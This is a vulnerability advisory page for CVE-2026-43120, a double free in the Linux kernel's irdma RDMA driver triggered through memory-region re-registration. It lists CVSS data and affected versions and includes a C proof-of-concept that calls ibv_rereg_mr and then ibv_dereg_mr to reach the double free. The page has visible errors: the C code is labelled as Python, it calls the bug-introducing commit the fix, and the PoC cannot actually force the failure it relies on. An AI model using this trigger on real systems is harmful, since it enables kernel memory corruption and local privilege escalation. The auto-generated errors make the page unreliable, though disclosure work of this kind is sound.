Security Vulnerability Report
中文
CVE-2026-43120 CVSS 7.8 HIGH

CVE-2026-43120

Published: 2026-05-06 10:16:26
Last Modified: 2026-05-12 21:37:38
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix double free related to rereg_user_mr If IB_MR_REREG_TRANS is set during rereg_user_mr, the umem will be released and a new one will be allocated in irdma_rereg_mr_trans. If any step of irdma_rereg_mr_trans fails after the new umem is allocated, it releases the umem, but does not set iwmr->region to NULL. The problem is that this failure is propagated to the user, who will then call ibv_dereg_mr (as they should). Then, the dereg_mr path will see a non-NULL umem and attempt to call ib_umem_release again. Fix this by setting iwmr->region to NULL after ib_umem_release. Fixed: 5ac388db27c4 ("RDMA/irdma: Add support to re-register a memory region")

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:* - VULNERABLE
Linux Kernel (Versions prior to fix commit 5ac388db27c4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Conceptual PoC for CVE-2026-43120 // Requires libibverbs and a vulnerable RDMA device (irdma) #include <infiniband/verbs.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> int main() { struct ibv_context *ctx; struct ibv_pd *pd; struct ibv_mr *mr; void *buf; size_t length = 4096; // 1. Open device and allocate Protection Domain // Note: Actual device opening requires specific device name int num_devices; struct ibv_device **dev_list = ibv_get_device_list(&num_devices); if (!dev_list || num_devices == 0) { perror("Failed to get RDMA devices"); return -1; } ctx = ibv_open_device(dev_list[0]); if (!ctx) { perror("Failed to open device"); return -1; } pd = ibv_alloc_pd(ctx); if (!pd) { perror("Failed to alloc PD"); return -1; } // 2. Register initial Memory Region buf = malloc(length); if (!buf) { perror("malloc failed"); return -1; } mr = ibv_reg_mr(pd, buf, length, IBV_ACCESS_LOCAL_WRITE); if (!mr) { perror("ibv_reg_mr failed"); return -1; } // 3. Attempt to reregister with IBV_REREG_TRANS // This flag triggers the vulnerable path in the kernel. // To trigger the bug, the kernel internal logic must fail // AFTER allocating the new umem. printf("Attempting to trigger vulnerable rereg_mr path...\n"); int ret = ibv_rereg_mr(mr, IBV_REREG_TRANS | IBV_REREG_ACCESS, pd, buf, length, IBV_ACCESS_LOCAL_WRITE); if (ret) { printf("Reregister failed as expected (error: %s).\n", strerror(ret)); // 4. Trigger the double free // The application assumes it should clean up the MR // because the previous operation failed. printf("Calling dereg_mr to trigger double free...\n"); ibv_dereg_mr(mr); printf("Double free likely triggered in kernel.\n"); } else { printf("Reregister succeeded. Vulnerability not triggered in this run.\n"); ibv_dereg_mr(mr); } free(buf); ibv_dealloc_pd(pd); ibv_close_device(ctx); ibv_free_device_list(dev_list); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43120", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-06T10:16:25.913", "lastModified": "2026-05-12T21:37:37.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/irdma: Fix double free related to rereg_user_mr\n\nIf IB_MR_REREG_TRANS is set during rereg_user_mr, the\numem will be released and a new one will be allocated\nin irdma_rereg_mr_trans. If any step of irdma_rereg_mr_trans\nfails after the new umem is allocated, it releases the umem,\nbut does not set iwmr->region to NULL. The problem is that\nthis failure is propagated to the user, who will then call\nibv_dereg_mr (as they should). Then, the dereg_mr path will\nsee a non-NULL umem and attempt to call ib_umem_release again.\n\nFix this by setting iwmr->region to NULL after ib_umem_release.\n\nFixed: 5ac388db27c4 (\"RDMA/irdma: Add support to re-register a memory region\")"}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.6.120", "versionEndExcluding": "6.6.136", "matchCriteriaId": "47055228-C2D7-4465-A276-87525D39743D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0c5d70bcb9d2275a1c8515a924016fcfeb4ab441", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0f22c32141acdcda266b26cab2b830baf870f3e0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/29a3edd7004bb635d299fb9bc6f0ea4ef13ed5a2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/62298a48f8b8788ad8b8464e6ffdf1ddebd2217e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/66964118f1f50ed85001c8fc9f7ab5bbdd021ee0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.